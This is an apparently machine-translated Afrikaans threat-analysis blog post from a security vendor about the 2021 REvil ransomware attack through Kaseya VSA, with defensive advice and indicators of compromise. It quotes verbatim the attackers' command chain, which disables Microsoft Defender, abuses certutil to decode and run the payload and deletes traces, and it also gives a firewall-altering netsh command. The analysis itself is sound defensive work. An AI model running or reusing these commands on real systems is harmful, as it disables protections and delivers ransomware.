• Produkte en dienste
        • Wolk

          • Endpoint Protection
          • Endpoint Detection and Response
          • Mobile Device Management
          • BJET
          • Extended Detection and Response
          • Zero Trust Network Access
          • Data Privacy
        • Op die perseel

          • Endpoint Protection
          • Endpoint Detection and Response
          • Data Privacy
        • platform

          • Malware Analysis Platform
        • Small Business

          • SOHO Total Edition
        • Dienste

          • Threat Intel
          • Digital Risk Protection Services (DRPS)
          • Ransomware Recovery as a Services (RRaaS)
          • DPDP Compliance
          • Managed Detection and Response
          • Kubersekuriteit & Data Privacy Bewustheid
  • Oplossings
    • BFSI
    • Onderwys
    • Regering
    • Healthcare
    • ITeS
    • vervaardiging
  • maatskappy
    • Oor Seqrite
    • Leierskap
    • Toekennings en sertifiserings
    • Nuus
  • Vennote
    • Vennootprogram
    • Vind Vennoot
    • Word 'n Vennoot
  • Ondersteuning
  • hulpbronne
    • blogs
    • White Papers
    • Datavelle
    • Gevallestudies
    • Bedreigingsverslae
    • Handleidings
    • PoV
    • begrip Data Privacy
    • Kontroleer jou risikotelling
    • DPDP Dialoë
    • Privaatheidsuur
Seqrite Labs Nuus
Kontak Verkope Onder Aanval?
  • Produkte en dienste
        • Wolk

          • Endpoint Protection
          • Endpoint Detection and Response
          • Mobile Device Management
          • BJET
          • Extended Detection and Response
          • Zero Trust Network Access
          • Data Privacy
        • Op die perseel

          • Endpoint Protection
          • Endpoint Detection and Response
          • Data Privacy
        • platform

          • Malware Analysis Platform
        • Small Business

          • SOHO Total Edition
        • Dienste

          • Threat Intel
          • Digital Risk Protection Services (DRPS)
          • Ransomware Recovery as a Services (RRaaS)
          • DPDP Compliance
          • Managed Detection and Response
          • Kubersekuriteit & Data Privacy Bewustheid
  • Oplossings
    • BFSI
    • Onderwys
    • Regering
    • Healthcare
    • ITeS
    • vervaardiging
  • maatskappy
    • Oor Seqrite
    • Leierskap
    • Toekennings en sertifiserings
    • Nuus
  • Vennote
    • Vennootprogram
    • Vind Vennoot
    • Word 'n Vennoot
  • Ondersteuning
  • hulpbronne
    • blogs
    • White Papers
    • Datavelle
    • Gevallestudies
    • Bedreigingsverslae
    • Handleidings
    • PoV
    • begrip Data Privacy
    • Kontroleer jou risikotelling
    • DPDP Dialoë
    • Privaatheidsuur
Webbladsy  /  ransomware  / REvil Keer Terug: Duik Dieper In Die Kaseya VSA Losprysware Aanval
REvil keer terug: Duik dieper in die Kaseya VSA-losprysware-aanval
15 Julie 2021

REvil keer terug: Duik dieper in die Kaseya VSA-losprysware-aanval

Geskryf deur Aravind Raj
Aravind Raj
ransomware

In 'n onlangse gebeurtenis het Kaseya – die Amerikaanse sagtewareverskaffer vir MSP's en IT-spanne – 'n wêreldwye voorsieningskettingaanval op 2 Julie 2021 gerapporteer wat die Amerikaanse Onafhanklikheidsdag as hefboom gebruik het, aangesien die personeel minder sou monitor. Die kuberkrakergroep het die nuldag-kwesbaarheid in die Kaseya VSA-sagteware uitgebuit om die REvil-ransomware by kliënte te ontplooi. Die aanval wat deur die REvil-bende gebruik is, het moontlik ongeveer 60 MSP's en hul sakekliënte geraak deur die voorsieningskettingtegniek te gebruik. Die aanvallers het 'n hoë losprys vir die dekripsieproses geëis of gedreig om die inligting te lek as hulle nie die losprys betaal nie.

Wat is REvil/Sodinokibi?

REvil/Sodinokibi/Sodin is 'n herbenaming van GrandCrab-ransomware wat gekoppel is aan die finansieel gemotiveerde GOLD SOUTHFIELD-groep. Die groep is bekend daarvoor dat hulle slagoffers se data steel voor enkripsie en dreig om dit vry te stel as die losprys nie betaal word nie.

Hulle is sedert April 2019 aktief en het byna 40% van die totale ransomware-infeksies wêreldwyd veroorsaak. Aanvanklik het die groep Asië en die Europese streke geteiken, maar nou het hulle wêreldwyd hul pad gevind.

Toe die ransomware die eerste keer verskyn het, het dit kwesbaarhede in bedieners en ander kritieke bates van KMO's en sagteware-installeerders uitgebuit om stelle te benut. Maar nou het hulle hul tendens na voorsieningskettingaanvalle begin. Ons het reeds gepubliseer blog met betrekking tot GrandCrab, wat baie soos die REvil lyk ransomware aanval.

Hoe het die aanvallers ingekom?

Die hackers het aanvalle op MSP-verskaffers geloods en die nuldag-kwesbaarheid uitgebuit [CVE-2021-30116] in VSA-bedieners op die perseel. Deur die VSA-bediener te infiltreer, sal enige aangehegte kliënt enige taak wat die VSA-bediener versoek sonder enige vraag uitvoer. Die aanvallers daaragter deaktiveer administratiewe toegang tot VSA sodra hulle toegang tot die slagoffer se netwerk verkry.

Daar is bevind dat die aanvallers die onderstaande IP-adresse gebruik het om die aanval te begin terwyl hulle gebruiker "agent curl/7.69.1" gebruik het.

  • 18[.]223.199.234
  • 161[.]35.239.148
  • 35[.]226.94.113
  • 162[.]253.124.162

Anders as die SolarWinds-voorsieningskettingaanval, toon Kaseya se bedieners geen aanduiding van kompromie nie. Baie van Kaseya se kliënte is MSP's. Die hackers het die plaaslike weergawe van die sagteware uitgebuit en kon die ransomware-aanval maklik stroomaf deurgee.

Die bedrag wat deur die groep geëis word, wissel van $50,000 5 tot $70 miljoen, afhangende van of die stelsel aan 'n domein gekoppel is of nie. Hulle het ook $XNUMX miljoen geëis vir die universele dekripteerder, wat op hul donker webwerf geplaas is.

 

Die tegniese besonderhede van die Kaseya VSA nul-dag aanval

  1. Die aanvanklike fase begin wanneer die kwaadwillige proses van Bestuurde Diensverskaffers (MSP's) die gebruikers bereik.
  2. Die VSA-proses het die enkripsie genaamd "Kaseya VSA Agent Hotfix" ontplooi, wat in die stelsel loop met administrateurtoegang om sekuriteitsmaatreëls vir die verwerking van die opdatering te omseil.
  3. Die uitgevoerde skrip word hieronder gegee, wat die Microsoft Defender-diens, DisableRealtimeMonitoring, DisableIntrusionPreventionSystem, DisableIOAVProtectio en DisableScriptScanning deaktiveer.
    “C:\WINDOWS\system32\cmd.exe” /c ping 127.0.0.1 -n 4979 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & kopieer /YC:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /fc:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe

     

  4. Wanneer hierdie opdatering verwerk word, lewer dit REvil-vrag met die kwaadwillige uitvoerbare laaier "agent.exe"
  5. Die Agent.exe het 'n geldige digitale handtekening wat deur "PE03 TRANSPORT LTD" onderteken is en 'n dag voor die aanval onderteken is.

    Aanroep van die sy-gelaaide Mpsvc.dll met behulp van MsMpEng.exe
  6. Deur die "MsMpEng.exe" te gebruik, word die "Mpscv.dll" sywaarts gelaai om die ransomware te laat loop.
  7. Die algehele prosesketting word soos volg uitgebeeld

    Algehele proses

Oor die uitvoering van die REvil Ransomware.

  • Dit begin die proses deur homself in die geheue te dekripteer en die konfigurasielêer wat in JSON-formaat gestoor is, te onttrek met konfigurasieparameters soos getoon. na hierdie skakel.
  • Anders as ander weergawes, verwyder dit nie Windows se "Shadow Copies" nie, wat gewoonlik deur die meeste ransomware gedoen word. As jy dit aktiveer, kan dit die proses stop, aangesien dit as 'n meganisme in die meeste antivirusmaatskappye gebruik word vir die opsporing van ransomware.
  • AES-enkripsie word gebruik om die privaat sleutels van die privaat-publieke sleutelpaar te enkripteer, wat plaaslik op die gebruiker se masjien gegenereer word.
  • Salsa20, aan die ander kant, word gebruik vir die enkripsie van gebruikerslêers.

    Stoor konfigurasie in die register
  • Dit skep ook die registersleutel "HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\BlackLivesMatter," waar die gegenereerde sleutels gestoor word. Hierdie sleutel bevat 'n privaat sleutel wat geïnkripteer is deur die publieke sleutel in die konfigurasie. Die publieke en privaat sleutels word in die binêre lêer geïnkripteer. Die geïnkripteerde string wat inligting bevat, word dan na C2-bedieners gestuur, waar 'n ewekansige lêeruitbreiding by geïnkripteerde lêers gevoeg word.
  • Deur die onderstaande opdrag te gebruik, voeg dit Windows-firewallinstellings by om die plaaslike stelsel deur ander rekenaars op die plaaslike netwerk te laat ontdek.
netsh advfirewall firewall stel reëlgroep = "Netwerkontdekking" nuwe aktiveer = Ja
  • Die enkripsie begin met verskeie drade en enkripteer die lêers wat in die uitbreidings verskaf word, insluitend netwerkaandrywers.
  • REvil gebruik die "Elliptiese-kurwe Diffie-Hellman" sleutelgenerering- en uitruilalgoritme om 'n privaat-publieke sleutelpaar te genereer. 'n Gedeelde geheime sleutel word ontwikkel om as die sleutel vir simmetriese enkripsie-algoritmes AES en Salsa20 te gebruik.
  • Sodra dit klaar is, word 'n losprysnota-lêer in elke vouer geplaas met prosedures oor hoe om die lêers terug te kry.

    Losprysnota
  • Die dekripsie kan slegs gedoen word na die betaling van die losprysbedrag, aangesien die universele dekripsie-instrument nog nie beskikbaar is nie.

    Dekripsiebladsy in donker web

Gevolgtrekking

Kaseya het die opdatering op 11 Julie vrygestel en ook die VSA SaaS-infrastruktuur weer aanlyn gebring. Die opdatering kan afgelaai word vanaf na hierdie skakelHulle het ook 'n instrument vrygestel vir die skandering van potensiële aanvalsrisiko-opsporing in die VSA-bediener en vir eindpuntskandering. Aflaai dit hier. Losprysware is die ernstigste probleem wat bedrywighede ontwrig. Die belangrikste motivering hiervoor is die finansiële voordele wat die aanvallers kry. Ons kan nie geteikende aanvalle stop nie, maar kan hulle voorkom.

Seqrite raai organisasies aan om op hul hoede te wees vir die groeiende risiko van ransomware-aanvalle en voorbereid te wees met voorvalreaksieplanne en 'n span wat probleme kan eskaleer.

Die proaktiewe maniere om hierdie tipe aanvalle te voorkom/beperk, is om

  • Sluit die voorsieningsketting in jou reaksie- en remediëringsplan in.
  • Beplan die bedreigingslandskap.
  • Maak seker dat jou voorsieningskettingverskaffers gestruktureerde, gevalideerde en gesertifiseerde sekuriteitsbeleide en -prosedures het.
  • Handhaaf huidige rugsteun van waardevolle data om die skade wat veroorsaak word, te verminder.

Hoe Seqrite sy gebruikers beskerm?

Quick Heal bied proaktiewe gereedskap om die ransomware-vrag in hierdie vlaag aanvalle te blokkeer. Quick Heal bespeur die monsters met die volgende opsporingsname:

  • Trojanransom.Gen
  • Trojan-losprysgeld.Sodin
  • Losprys.Verwyt
  • Trojanransom.Encoder
  • Trojan.Agent

Aanwysers van kompromie (IoC's)

Loader

  • 0299e3c2536543885860c7b61e1efc3f
  • 5a97a50e45e64db41049fd88a75f2dd2
  • be6c46239e9c753de227bf1f3428e271
  • 835f242dde220cc76ee5544119562268
  • 18786bfac1be0ddf23ff94c029ca4d63
  • 8535397007ecb56d666b666c3592c26d
  • 561cffbaba71a6e8cc1cdceda990ead4

DLL

  • 78066A1C4E075941272A86D4A8E49471
  • 040818b1b3c9b1bf8245f5bcb4eebbbc
  • 849fb558745e4089a8232312594b21d2
  • 4a91cb0705539e1d09108c60f991ffcf
  • 7d1807850275485397ce2bb218eff159
  • a560890b8af60b9824c73be74ef24a46
  • a47cf00aedf769d60d58bfe00c0b5421

REvil-konfigurasielêer

Klik Hier

Verwysings

Advies oor Kaseya VSA-voorsieningsketting-losware-aanval

 

 

 

 vorige PosSeqrite ontbloot tweede golf van Operasie SideCopy wat Indi teiken...
volgende Pos  Skuif jy na die wolk? Leer hoe om jou kuberrisiko's op die ... te bestuur
Aravind Raj

Oor Aravind Raj

Aravind Raj is 'n Sekuriteitsnavorser by Quick Heal Security Lab. Hy stel belang in wanware-analise, omgekeerde ingenieurswese, outomatisering van take en hy is 'n persoon wat...

Artikels deur Aravind Raj »

Verwante poste

  • Beste insidentresponstegnieke vir losprysware-aanvalle om skade te minimaliseer

    Junie 2, 2026
  • Hoe om te herstel van 'n losprysware-aanval sonder om die losprys te betaal

    Mag 25, 2026
  • Losprysware-aanval oor publiek gedeelde SMB2-verbindings en beskermd bly met Seqrite

    Maart 11, 2025
Aanbevole outeurs
  • Seqrite
    Seqrite

    Seqrite is 'n toonaangewende verskaffer van kuberveiligheidsoplossings vir ondernemings. Met 'n fokus...

    Lees meer artikels deur Seqrite
  • Jyoti Karlekar
    Jyoti Karlekar

    Ek is 'n ywerige skrywer wat daarvan hou om inhoud oor opkomende tegnologieë te skep en...

    Lees meer artikels deur Jyoti Karlekar
  • Bineesh P
    Bineesh P

    Ek is 'n passievolle kuberveiligheidsentoesias en 'n toegewyde skrywer. Met 'n aanleg...

    Lees meer artikels deur Bineesh P.
  • Sanjay Katkar
    Sanjay Katkar

    Sanjay Katkar is die mede-besturende direkteur van Quick Heal Technologies...

    Lees meer artikels deur Sanjay Katkar
onderwerpe
bekwaam (25) Kuberaanval (36) kuber-aanvalle (58) cyberattack (16) cyberattacks (15) Kuber sekuriteit (341) kuber-sekuriteit (34) Cyber ​​bedreiging (33) kuber bedreigings (51) databreuk (56) data oortredings (29) verlies van data (28) voorkoming van dataverlies (34) data privacy (16) die beskerming van data (34) beveiliging van data (19) DLP (50) DPDP (14) DPDPA (17) Enkripsie (16) eindpunt sekuriteit (113) Onderneming sekuriteit (20) ontgin (13) BBP (14) malware (76) malware analise (14) malware aanval (23) MDM (27) Microsoft (15) MITER ATT&CK (14) sekuriteit netwerk (26) phishing (30) ransomware (69) ransomware aanval (31) ransomware aanvalle (31) ransomware beskerming (17) Seqrite (41) Seqrite Enkripsie (27) Seqrite EPS (33) Seqrite Dienste (16) bedreiging opsporing (14) Threat Intelligensie (21) UTM (34) Kwesbaarheid (16) nul vertroue (13)
Seqrite Labs

Toonaangewende verskaffer van IT-sekuriteitsoplossings vir ondernemings wat eindpunt-, data- en netwerksekuriteit vereenvoudig met die beste oplossings vir bedreigingsvoorkoming, -opsporing en -reaksie wêreldwyd.

Lees meer oor Seqrite

Volg ons:

Teken in op ons nuusbrief

Bly op hoogte van die nuutste kuberveiligheidstendense en insigte.

Laai
Produkte en dienste
  • Wolk
  • Endpoint Protection
  • Endpoint Detection and Response
  • Mobile Device Management
  • BJET
  • Extended Detection and Response
  • Zero Trust Network Access
  • Data Privacy
  • Op die perseel
  • Endpoint Protection
  • Endpoint Detection and Response
  • Data Privacy
  • platform
  • Malware Analysis Platform
  • Mikrobesigheid
  • SOHO Total Edition
  • Dienste
  • Threat Intel
  • Digital Risk Protection Services (DRPS)
  • Ransomware Recovery as a Services (RRaaS)
  • DPDP Compliance
  • Managed Detection and Response
  • Kubersekuriteit & Data Privacy Bewustheid
hulpbronne
  • blogs
  • White Papers
  • Datavelle
  • Bedreigingsverslae
  • Handleidings
  • PoV
  • begrip Data Privacy
  • DPDP Dialoë
  • Beleid en Nakoming
  • EULA
  • GoDeep.KI
  • SIA
  • Privaatheidsuur
Kontak Ons
  • Geregistreerde kantore
  • Kom ons praat oor kuberveiligheid
Ondersteuning
  • Tegniese ondersteuning
  • Laai sagteware af
  • Vanlyn Opdaterer
  • Firmware-opgraderings
  • Opgraderings
  • Produk Dokumentasie
Oor Ons
  • Oor Seqrite
  • Leierskap
  • Toekennings en erkenning
  • Nuus
vennoot
  • Vennootprogram
  • Vind Vennoot
  • Word 'n Vennoot
  • Seqrite sertifisering

© 2026 Quick Heal Technologies Bpk.

Webkaart Privaatheidsbeleid regskennisgewings Koekiebeleide Terme van die gebruik